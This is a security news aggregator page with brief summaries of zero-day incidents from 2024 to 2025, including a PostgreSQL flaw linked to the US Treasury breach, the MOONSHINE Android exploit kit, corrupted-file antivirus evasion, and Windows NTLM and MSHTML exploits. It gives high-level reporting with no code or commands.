We value your privacy

We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By clicking "Accept All", you consent to our use of cookies.

Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

NewApp Digest
search bot

zero-day attack

Serious PostgreSQL flaw exploited in US Treasury zero-day attack
Tech Optimizer
February 21, 2025

Serious PostgreSQL flaw exploited in US Treasury zero-day attack

Security researchers have identified a zero-day vulnerability in PostgreSQL, labeled CVE-2025-1094, which is believed to have contributed to the cyber breach of the US Treasury in December. The breach was initially attributed to the command injection vulnerability CVE-2024-12356 in the BeyondTrust Remote Support platform. Successful exploitation of CVE-2024-12356 required prior exploitation of CVE-2025-1094. Although BeyondTrust issued a patch for CVE-2024-12356 in December 2024, it did not resolve the underlying issue of CVE-2025-1094, leaving it a zero-day vulnerability until reported to PostgreSQL. Chinese hackers reportedly gained remote access to multiple workstations within the US Treasury, potentially compromising unclassified documents. The details of the accessed documents and the number of workstations involved are not disclosed. This incident is part of a broader pattern of cyber attacks linked to Chinese state-sponsored actors.
MOONSHINE Kit Exploiting Android Messaging Apps Flaw To Inject Backdoor
AppWizard
December 5, 2024

MOONSHINE Kit Exploiting Android Messaging Apps Flaw To Inject Backdoor

A sophisticated exploit kit named MOONSHINE targets Android messaging applications to implant backdoors into users' devices. The entity behind these attacks, Earth Minotaur, focuses on the Tibetan and Uyghur communities by distributing crafted messages through instant messaging platforms, encouraging victims to click on malicious links, redirecting them to servers hosting the MOONSHINE exploit kit, and installing a cross-platform backdoor called DarkNimbus. The upgraded MOONSHINE kit uses pre-configured attack links, browser version verification, multiple Chromium exploits, and phishing for downgrade techniques. It can target various Android applications, including WeChat, Facebook, Line, and QQ. The DarkNimbus backdoor has both Android and Windows versions, with features for gathering device information, extracting personal data, and facilitating surveillance. MOONSHINE has been linked to other Chinese operations, including POISON CARP and UNC5221, indicating a shared ecosystem among Chinese threat actors. Users are advised to be cautious with suspicious links and keep applications updated to mitigate vulnerabilities.
Hackers bypass antivirus using corrupted files
Tech Optimizer
December 5, 2024

Hackers bypass antivirus using corrupted files

Researchers at ANY.RUN have identified a zero-day attack campaign operational since at least August 2024, which employs corrupted files to bypass security measures. Attackers use corrupted files, often disguised as ZIP archives or DOCX documents, to exploit vulnerabilities in file-handling processes, allowing them to evade antivirus software, sandbox environments, and email spam filters. These files execute malicious code when opened, despite their damaged appearance. Conventional antivirus solutions struggle to scan these files effectively, static analysis tools fail to process them, and advanced email filters cannot intercept them. ANY.RUN’s interactive sandbox can dynamically analyze these corrupted files in real-time, identifying malicious activity that traditional security tools miss. The attack process involves delivering a corrupted file via email, leading to detection failure by security tools, execution through built-in recovery mechanisms in applications, and identification of malicious behavior by the sandbox. This highlights the need for advanced threat detection techniques to maintain robust cybersecurity.
How Hackers Are Using Corrupted Word Docs To Cleverly Evade Antivirus Tools
Tech Optimizer
December 3, 2024

How Hackers Are Using Corrupted Word Docs To Cleverly Evade Antivirus Tools

Security researchers at Any.Run have discovered a zero-day attack that bypasses detection tools used by security professionals. This attack utilizes deliberately corrupted files that evade antivirus software, obstruct uploads to sandboxes, and circumvent Outlook's spam filters. These files are sent via email, disguised as communications from payroll or human resources. When opened, they prompt a restoration process in software like Microsoft Word, which can redirect users to credential-stealing sites. This method combines social engineering and malware, posing a significant threat to organizations reliant on detection tools.
New Zero-Day Vulnerability in Windows Themes Threatens NTLM Security - SOCRadar® Cyber Intelligence Inc.
Winsage
October 30, 2024

New Zero-Day Vulnerability in Windows Themes Threatens NTLM Security – SOCRadar® Cyber Intelligence Inc.

A newly identified zero-day vulnerability in Windows Themes files allows attackers to exploit NTLM credential leaks by simply having a malicious theme file viewed in Windows Explorer. This vulnerability, reported by ACROS Security, affects fully updated Windows systems, including Windows 11 24H2, and enables remote credential theft without user interaction. Microsoft previously addressed a related issue with a patch for CVE-2024-21320, but researchers discovered that attackers could bypass this fix, leading to the emergence of CVE-2024-38030. ACROS Security has released a temporary micropatch via their 0patch service to prevent NTLM leaks by accurately detecting network paths within theme files. The vulnerability allows attackers to execute NTLM relay and pass-the-hash attacks across multiple Windows versions, from Windows 7 to Windows 11 24H2. A demonstration showed that transferring a malicious theme file to an unpatched PC triggers a network connection that sends NTLM credentials to the attacker, while the micropatch blocks this connection.
North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware
Winsage
October 16, 2024

North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware

ScarCruft, a North Korean cyber group, exploited a zero-day vulnerability in Windows, identified as CVE-2024-38178, which has a CVSS score of 7.5 and is a memory corruption issue in the Scripting Engine. This vulnerability allows for remote code execution when users interact with the Edge browser in Internet Explorer Mode. Attackers entice users to click on a malicious URL to execute code. Microsoft patched this flaw in August 2024. The attack, dubbed "Operation Code on Toast," involved compromising a domestic advertising agency's server to inject exploit code into toast advertisement programs, which are pop-up notifications in South Korea. The exploitation led to a type confusion error in the JavaScript Engine of Internet Explorer, allowing the attackers to infect PCs with the vulnerable toast program. The malware associated with this attack, RokRAT, has advanced capabilities and uses legitimate cloud services for command-and-control operations. ScarCruft has a history of exploiting vulnerabilities in legacy browsers and has previously targeted other vulnerabilities in the Scripting Engine. Users are advised to keep their systems updated to mitigate risks.
Void Banshee Group Used ‘Windows Relic’ IE in Phishing Campaign
Winsage
July 17, 2024

Void Banshee Group Used ‘Windows Relic’ IE in Phishing Campaign

The ZDI threat hunting team discovered and analyzed samples exploiting CVE-2024-38112, which allowed attackers to run and execute files and websites through the disabled IE process by exploiting MSHTML. The vulnerability was used in a spearfishing campaign by the operators behind Void Banshee, targeting victims in North America, Europe, and Southeast Asia. The campaign distributed malicious files disguised as PDFs through cloud sharing websites, Discord servers, and online libraries. The malware used in the campaign, Atlantida stealer, targets sensitive information from various applications and can collect system information and geolocation data. The exploitation tactic is similar to another MSHTML vulnerability, CVE-2021-40444, and both have been patched by Microsoft. Unsupported Windows relics like Internet Explorer are an overlooked attack surface that can still be exploited by threat actors. Organizations should keep their software updated to protect themselves from security vulnerabilities.
Search